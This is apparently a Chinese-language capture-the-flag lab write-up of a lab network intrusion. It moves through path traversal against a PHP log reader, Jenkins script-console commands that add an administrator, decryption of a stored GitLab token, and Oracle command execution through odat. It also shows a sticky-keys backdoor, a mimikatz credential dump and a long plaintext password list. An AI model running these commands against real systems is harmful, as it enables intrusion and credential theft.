目录

flag1

fscan64 -h 39.98.109.209
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.109.209   is alive
[*] Icmp alive hosts len is: 1
39.98.109.209:80 open
39.98.109.209:135 open
39.98.109.209:139 open
39.98.109.209:3306 open
39.98.109.209:8080 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo:
[*]39.98.109.209
   [->]XR-JENKINS
   [->]172.22.14.7
[*] WebTitle: http://39.98.109.209:8080 code:403 len:548    title:None
[*] WebTitle: http://39.98.109.209      code:200 len:54689  title:XR SHOP
[+] http://39.98.109.209/www.zip poc-yaml-backup-file
已完成 5/5
[*] 扫描结束,耗时: 1m6.0588993s

访问www.zip得到源码。是个wordpress,这里有个tools,里面有任意文件读取

image-20231005235502357

<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file is exist.
if ( file_exists( $logfile ) ) {
  // Get the content and echo it.
  $text = file_get_contents( $logfile );
  echo( $text );
}
exit;

先拿flag

http://39.98.109.209/tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt

image-20231005235542586

flag2

根据题目提示读取8080端口的jenkins服务的初始密码

http://39.98.109.209/tools/content-log.php?logfile=../../../../../../../../../ProgramData/Jenkins/.jenkins/secrets/initialAdminPassword
510235cf43f14e83b88a9f144199655b

登录一下后台

http://39.98.109.209:8080/login
admin/510235cf43f14e83b88a9f144199655b
http://39.98.109.209:8080/

image-20231006000148566

点到Manage Jenkins,再点脚本命令行

image-20231006000246203

添加用户

println "net user test Abcd1234 /add".execute().text
println "net localgroup administrators test /add".execute().text

远程桌面登录一下

image-20231006000731035

C:\Users\test\Desktop>ipconfig

Windows IP 配置


以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::775d:152:2452:8edb%3
   IPv4 地址 . . . . . . . . . . . . : 172.22.14.7
   子网掩码  . . . . . . . . . . . . : 255.255.0.0
   默认网关. . . . . . . . . . . . . : 172.22.255.253

上传fscan扫一下

172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.31:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.7:8080 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.16:9094 open
[*] NetInfo:
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] NetInfo:
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] WebTitle: http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] NetInfo:
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] NetInfo:
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] NetBios: 172.22.14.11    [+]DC XIAORANG\XR-DC           
[*] NetBios: 172.22.14.46    XIAORANG\XR-0923               
[*] NetBios: 172.22.14.31    WORKGROUP\XR-ORACLE            
[*] WebTitle: http://172.22.14.16       code:302 len:99     title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle: http://172.22.14.7:8080   code:403 len:548    title:None
[*] WebTitle: http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[*] WebTitle: http://172.22.14.7        code:200 len:54603  title:XR SHOP
[*] WebTitle: http://172.22.14.16/users/sign_in code:200 len:34961  title:Sign in · GitLab
[+] http://172.22.14.7/www.zip poc-yaml-backup-file

整理一下

172.22.14.7 (XR-JENKINS)(已经拿下)
172.22.14.46 (XR-0923)
172.22.14.11 (XR-DC)
172.22.14.31 (XR-ORACLE)
172.22.14.16 (GitLab)

挂个代理打16那台机子,就是gitlab

先在jenkins里面找gitlab的api token

image-20231006001502437

image-20231006001544602

找到密文

{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}

然后回到脚本控制台获取对应的明文

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

image-20231006001649261

得到api token

glpat-7kD_qLH2PiQv_ywB9hz2

用脚本去访问项目

ic3s3137/gitlab_api_browser (github.com)

python gitlab_browser.py http://172.22.14.16 glpat-7kD_qLH2PiQv_ywB9hz2

接着就是一个个dir路径来找 oracle 的账号密码

id 4
cat ruoyi-admin/src/main/resources/application-druid.yml
Project 4 >>> cat ruoyi-admin/src/main/resources/application-druid.yml
# 数据源配置
spring:
    datasource:
        type: com.alibaba.druid.pool.DruidDataSource
        driverClassName: oracle.jdbc.driver.OracleDriver
        druid:
            # 主库数据源
            master:
                url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
                username: xradmin
                password: fcMyE8t9E4XdsKf
            # 从库数据源
            slave:
                # 从数据源开关/默认关闭
                enabled: false
                url:
                username:
                password:
            # 初始连接数
            initialSize: 5
            # 最小连接池数量
            minIdle: 10
            # 最大连接池数量
            maxActive: 20
            # 配置获取连接等待超时的时间
            maxWait: 60000
            # 配置间隔多久才进行一次检测,检测需要关闭的空闲连接,单位是毫秒
            timeBetweenEvictionRunsMillis: 60000
            # 配置一个连接在池中最小生存的时间,单位是毫秒
            minEvictableIdleTimeMillis: 300000
            # 配置一个连接在池中最大生存的时间,单位是毫秒
            maxEvictableIdleTimeMillis: 900000
            # 配置检测连接是否有效
            validationQuery: SELECT 1 FROM DUAL
            testWhileIdle: true
            testOnBorrow: false
            testOnReturn: false
            webStatFilter:
                enabled: true
            statViewServlet:
                enabled: true
                # 设置白名单,不填则允许所有访问
                allow:
                url-pattern: /druid/*
                # 控制台管理用户名和密码
                login-username:
                login-password:
            filter:
                stat:
                    enabled: true
                    # 慢SQL记录
                    log-slow-sql: true
                    slow-sql-millis: 1000
                    merge-sql: true
                wall:
                    config:
                        multi-statement-allow: true
                username: xradmin
                password: fcMyE8t9E4XdsKf

用odat直接添加用户,odat要装几个依赖,根据报错来就行

proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user test2 Abcd1234 /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators test2 /add'

远程桌面连接,直接拿flag

image-20231006002631863

flag3

python gitlab_browser.py http://172.22.14.16 glpat-7kD_qLH2PiQv_ywB9hz2

看项目六

id 6
Project 6 >>> cat credentials.txt
Machine | Username | Password
-----------------------------
XR-0776 | huangmin | 8I5VZpg4Mf
XR-0777 | zhangrong | cHY716Zauf
XR-0778 | liying | JKe5IFEasb
XR-0779 | zhaoli | bYaT8pnoQ7
XR-0780 | zhangyan | EyHJTxY5LA
XR-0781 | zhoujing | 7AJXxfY9Oi
XR-0782 | liuying | 3Q29kxupsU
XR-0783 | wanghao | APQ5Sxvd0n
XR-0784 | wangqiang | WebaBkv4lh
XR-0785 | wanglu | 5CtYa9XmZW
XR-0786 | zhaoyong | FbquAxEwJf
XR-0787 | zhangli | pCuPEbYl8B
XR-0788 | wangning | JL6By9mUDP
XR-0789 | wangyu | WVIrHMljRh
XR-0790 | yangli | hNuHLKxU6m
XR-0791 | zhangqian | e7RSK4wnLV
XR-0792 | lishuai | ymjieu5FzP
XR-0793 | yangliu | QXfZmcSV97
XR-0794 | wangying | 51Je2P8iFB
XR-0795 | chenjie | jFGv3tKSp9
XR-0796 | yangyong | wafYnDCJxv
XR-0797 | lipeng | YCo0bBQrNJ
XR-0798 | lixin | pT1DUgbflC
XR-0799 | liukai | EgywVJW2Un
XR-0800 | machao | H1XqljRYgD
XR-0801 | lijia | vxjUbe1K7V
XR-0802 | zhangping | lPq6LmHh8x
XR-0803 | zhanghui | Z4mjpzt281
XR-0804 | zhangwen | hT0wp2xKdJ
XR-0805 | wangmin | 6ykzR2AuKh
XR-0806 | chenlin | QPEFJ7c8io
XR-0807 | chenjuan | kAsC9UvBfP
XR-0808 | lining | 4QgT65dbMz
XR-0809 | wangwei | MZ3ehq8Gd0
XR-0810 | zhangnan | 1uXL5jvblq
XR-0811 | wangxia | K04W23mUXx
XR-0812 | zhangyu | CiycwuGxHE
XR-0813 | chenchen | q5GPSZv2rB
XR-0814 | wangbing | tHgvbCRj5F
XR-0815 | lilin | bTrGF97RMJ
XR-0816 | zhangling | T5HfUYwh8n
XR-0817 | chenling | 2MH0sXUvnN
XR-0818 | yangmei | jJ4iKS6WMN
XR-0819 | liuqiang | LRptNZWUAh
XR-0820 | lihong | TXbnO76oNg
XR-0821 | lilei | qvaN1rK0AY
XR-0822 | wanghuan | X3iFcTyOmv
XR-0823 | wangxin | ADSMd4l5w8
XR-0824 | yangping | QRiej9HcTK
XR-0825 | lijie | Az9OG4ibCH
XR-0826 | wangqian | PB9KAtTjWC
XR-0827 | liping | R8qFTAQV63
XR-0828 | liuhui | YOzAaNq8Io
XR-0829 | zhangming | 4p08EcFzsm
XR-0830 | zhangying | MHPwUoQImi
XR-0831 | libo | E23ztI9LUe
XR-0832 | liuqin | bsmrRkLoqT
XR-0833 | wangchao | ACz5Q73oUa
XR-0834 | liuli | x2XuZsIJtm
XR-0835 | yangwei | wKYHlDXkmq
XR-0836 | wangyan | yg1HXxWu2s
XR-0837 | wangjian | zUo7vHb8OY
XR-0838 | zhangbin | r8m01CcS4f
XR-0839 | wangli | Im8WSeGlEf
XR-0840 | wangdan | qIvBQ0p1kP
XR-0841 | liuxia | B69KWIACtq
XR-0842 | zhangrui | u2KVeb683m
XR-0843 | wangdong | rEtTIU8BLD
XR-0844 | wangting | Jkunlz29eg
XR-0845 | zhangjian | Zyp9lDorhg
XR-0846 | wanghua | 74ksE5BmHc
XR-0847 | liyan | rEOAslLQR0
XR-0848 | liufeng | LUZcuoFxfG
XR-0849 | zhangbo | XHvBV4ujQc
XR-0850 | liuming | jBWDJfZ93c
XR-0851 | liujia | PmpXKckTs9
XR-0852 | chentao | 2sHutpN8iY
XR-0853 | zhangting | e3wg2nIu7Z
XR-0854 | liushuai | iY2fbz1HQB
XR-0855 | lijing | MCIcl6sgNQ
XR-0856 | wangbin | msxNSIlj8G
XR-0857 | lijian | IUilEz5SYQ
XR-0858 | zhouyong | v36CT5ILMU
XR-0859 | liudan | AKkCpEnLvx
XR-0860 | yangbin | yE9G3VSnsO
XR-0861 | liupeng | ryLTgeDZhI
XR-0862 | chenjun | kngEGACsQh
XR-0863 | wangbo | FbK6fsiPBn
XR-0864 | libin | b2BcHWCEYO
XR-0865 | zhaowei | 2hrJ64tgqG
XR-0866 | lijuan | XBkgKysUbz
XR-0867 | chenchao | oDU7vPZ84B
XR-0868 | wangming | vKpV13DemJ
XR-0869 | lifang | TbzE3tWF4y
XR-0870 | wangtao | yaxpPWRkiB
XR-0871 | liufang | Fde8Gt1bmq
XR-0872 | litao | VCurpwXIA4
XR-0873 | yangling | PInqR2xBK0
XR-0874 | yangxue | sxjQ75mLzK
XR-0875 | liubin | sWeharCdXE
XR-0876 | yangyang | FZ6r8LMA5U
XR-0877 | xuwei | 0B4Du1h7zV
XR-0878 | chenyong | Folq5iOnej
XR-0879 | yangbo | ZlIs9LYNeW
XR-0880 | zhanghua | oFHU1Z0VKM
XR-0881 | zhaomin | IafjNO3Hib
XR-0882 | chenping | qJQXKkVpFP
XR-0883 | zhanglei | 61kcLxqTiu
XR-0884 | zhangliang | j5Ls2Hub3i
XR-0885 | zhangtao | 5PAcQGy461
XR-0886 | zhangxue | eY3DrwsijQ
XR-0887 | liqian | 7jHvompSTN
XR-0888 | liwei | wjTFE8x0IY
XR-0889 | chenbin | sm7lR86Y4p
XR-0890 | zhangyun | mWzkyDJMRq
XR-0891 | wangxue | pfR5VoUZO1
XR-0892 | zhouwei | oN3Sd60khs
XR-0893 | likai | QwzvK1qm4j
XR-0894 | gaofeng | 5fQvjFU1uN
XR-0895 | wanglei | 1apTkBr9Y6
XR-0896 | lijun | cVBI8nsCwA
XR-0897 | liuwei | 0VBecvT4Au
XR-0898 | wanggang | rCGB4wFh5X
XR-0899 | liuping | UQaX9DBLbJ
XR-0900 | zhangning | SLqJiM1QTy
XR-0901 | libing | ZgXlj6VKPu
XR-0902 | zhangchao | tSBpVjiYh8
XR-0903 | zhangxia | hRlYXkqceC
XR-0904 | limin | s3I4lFctoE
XR-0905 | liulei | V5rsKkeWSJ
XR-0906 | wangling | lL7QinBydG
XR-0907 | zhangfei | jO1xtU6hP4
XR-0908 | chenlong | wKDFqcOfmp
XR-0909 | liufei | 36BjIW1VgH
XR-0910 | chenli | eYiOh4jWUq
XR-0911 | chenyan | oad8rYbwfs
XR-0912 | chenpeng | US2Am1iIk8
XR-0913 | wangrui | DTZ1xgz3cS
XR-0914 | zhangfeng | SHxNByGuwX
XR-0915 | yanglin | riwW3UkI4o
XR-0916 | liutao | HFVUOZEPpL
XR-0917 | liyong | wZyEuVvOjQ
XR-0918 | wangna | 6i840wmbv1
XR-0919 | wangjuan | fJv4PKASzb
XR-0920 | wanghui | 7qT4wcMSGv
XR-0921 | lilong | pHTkl3dEIU
XR-0922 | lili | 0LRQxIuV9t
XR-0923 | zhangshuai | wSbEajHzZs
XR-0924 | zhangfan | TrfCMlmY59
XR-0925 | liujing | gtOslNQDB2
XR-0926 | liuqian | tqX9DVLTHI
XR-0927 | yangfang | sa18OlILmB
XR-0928 | chenqiang | VEKnlwgFpU
XR-0929 | liqiang | pZbj7z9H8v
XR-0930 | yangjun | pqahdFK2PZ
XR-0931 | chenbo | 78SmUu1gfi
XR-0932 | zhangyong | CS4sx0MvUF
XR-0933 | wangliang | 4vV6UjqzOQ
XR-0934 | wangxu | UfTgi40DV9
XR-0935 | chenhua | lWS207vdOf
XR-0936 | zhouli | DuMiQOb0qK
XR-0937 | liubing | NXwAreabgd
XR-0938 | zhaojing | Ru3Gen8YBM
XR-0939 | yangyan | IHrpmeTNfl
XR-0940 | chenfang | d3nUGRgs24
XR-0941 | zhanghao | Yu0ZbEKFIT
XR-0942 | wangyun | 0rwTmed8SJ
XR-0943 | zhangxin | 8vPF5hzoAa
XR-0944 | zhangwei | YLwUpHNS6X
XR-0945 | wangping | FqhfMozSXp
XR-0946 | wangkai | D04bXHTKpc
XR-0947 | liuchang | Ue60X3sGrS
XR-0948 | lixue | CHbgqOTeIc
XR-0949 | lina | rwanydljVu
XR-0950 | liwen | edc0M7yvQu
XR-0951 | liming | yziSjWBoCH
XR-0952 | liling | wmdjRaIBAS
XR-0953 | chenwei | xcqN5VPbCM
XR-0954 | lihao | iUpmDYS2CL
XR-0955 | wanglin | 5pgFojT6wI
XR-0956 | zhanglin | x7OgKTdhyQ
XR-0957 | xumin | QuMKRHoB3U
XR-0958 | liuyan | g1wN7ydrLh
XR-0959 | zhangmin | e9XBQqEtPp
XR-0960 | zhangqiang | vcKRYUDOGL
XR-0961 | yangchao | MhUkEeWYBF
XR-0962 | yanghua | fZUCSaoiIt
XR-0963 | ligang | CdgFjNf1Mk
XR-0964 | liuxin | knHhJmBwEM
XR-0965 | liuhuan | pZSHNhjkq9
XR-0966 | lifeng | jRAkFxLT5e
XR-0967 | liugang | YA2mVzSs5K
XR-0968 | yangtao | 4b32TQLP6y
XR-0969 | liuhao | 0EPZ6Fyism
XR-0970 | lichao | ultLQzWN34
XR-0971 | yanghong | Ig2BNLMuWf
XR-0972 | chenhong | Q4eOjNym6S
XR-0973 | sunwei | drjUYgi3T0
XR-0974 | zhanghong | sRkmQIB5La
XR-0975 | zhangdan | b2HoSCuhaM
XR-0976 | liumin | FPRm6W7wGs
XR-0977 | wangmei | yq7MVcj4se
XR-0978 | zhangjing | WR4Ef16FiU
XR-0979 | liujun | DEwYySf6Ni
XR-0980 | wangyong | h9XMZiEv0g
XR-0981 | huangyong | DgoIyPSTHZ
XR-0982 | lixiang | TAoPcpiF3g
XR-0983 | zhoujie | YrlB2gMuxF
XR-0984 | liuchao | ijaDY4Ilr3
XR-0985 | liuna | 6xn2jo17SE
XR-0986 | wangjing | 65MhGVI0oL
XR-0987 | liuling | MjmN9ahSLR
XR-0988 | chenjing | ha23yfqcPg
XR-0989 | wangqin | MsdW85gzFL
XR-0990 | wanglong | O3oD1lscAK
XR-0991 | chenlei | 3vtAJqzrYB
XR-0992 | yangjie | fuTBeq6z51
XR-0993 | zhangjun | l02GAEUHq9
XR-0994 | yangming | N3bYUqfenc
XR-0995 | zhangmei | S7DG5bgXtN
XR-0996 | wangrong | 2BPmaxilGq
XR-0997 | zhangpeng | BHOqDmCXMn
XR-0998 | liuyun | CB7sxbk84I
XR-0999 | wangkun | KuJH519OWg
XR-01000 | chenmin | e4gQGHorq3
XR-01001 | liqin | 4zEJkYPIpq
XR-01002 | wangfang | FTVYd4W02u
XR-01003 | liuhua | P9ndfu8wGh
XR-01004 | zhangqin | 0f1JTN5Qqp
XR-01005 | zhanglong | nH8mDpRbcN
XR-01006 | zhangjie | cTVwM25y3h
XR-01007 | liliang | Rf6zXV0YEI
XR-01008 | liyun | 3hxTmEoMBl
XR-01009 | wangcheng | Boy4Ezp987
XR-01010 | yangjing | gjhbXHcLW0
XR-01011 | chenying | koGFcPeBmi
XR-01012 | lihua | nSOjeYV3Nr
XR-01013 | liumei | yxAm2nWNp9
XR-01014 | yangjuan | Gpe6Au2hxF
XR-01015 | lidan | ogDLzMhCVP
XR-01016 | liyang | nDWvGhNMoe
XR-01017 | zhaojun | XtfZYOxeDJ

上面fscan收集到的是

[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46

找到账户密码直接登录

zhangshuai/wSbEajHzZs

image-20231006093506256

image-20231006093530115

image-20231006093619623

账户属于 Remote Desktop Users 和 Remote Management Users 组, 因此可以连接 rdp 和 winrm

proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

image-20231006093849770

成功的获得了 SeRestorePrivilege

image-20231006093919622

https://github.com/gtworek/Priv2Admin

ren sethc.exe sethc.bak
ren cmd.exe sethc.exe

image-20231007001230955

然后回到远程桌面,锁定用户,连按五下shift

image-20231007001310108

image-20231007001445633

拿到flag03.txt

加个用户

net user test2 Abcd1234 /add
net localgroup administrators test2 /add

然后就可以远程登录了

然后改回cmd命令

ren sethc.exe cmd.exe

flag4

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 2816655 (00000000:002afa8f)
Session           : RemoteInteractive from 3
User Name         : test2
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2023/10/7 0:16:04
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : test2
         * Domain   : XR-0923
         * NTLM     : c780c78872a102256e946b3ad238f661
         * SHA1     : bc4e7d2a003b79bb6ffdfff949108220c1fad373
        tspkg :
        wdigest :
         * Username : test2
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : test2
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2816563 (00000000:002afa33)
Session           : RemoteInteractive from 3
User Name         : test2
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2023/10/7 0:16:04
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : test2
         * Domain   : XR-0923
         * NTLM     : c780c78872a102256e946b3ad238f661
         * SHA1     : bc4e7d2a003b79bb6ffdfff949108220c1fad373
        tspkg :
        wdigest :
         * Username : test2
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : test2
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2791178 (00000000:002a970a)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/7 0:16:04
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 786221 (00000000:000bff2d)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2023/10/7 0:03:46
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : wSbEajHzZs
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 744799 (00000000:000b5d5f)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/7 0:03:45
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/6 23:59:10
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2790787 (00000000:002a9583)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/7 0:16:04
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2789066 (00000000:002a8eca)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/7 0:16:04
SID               : S-1-5-96-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
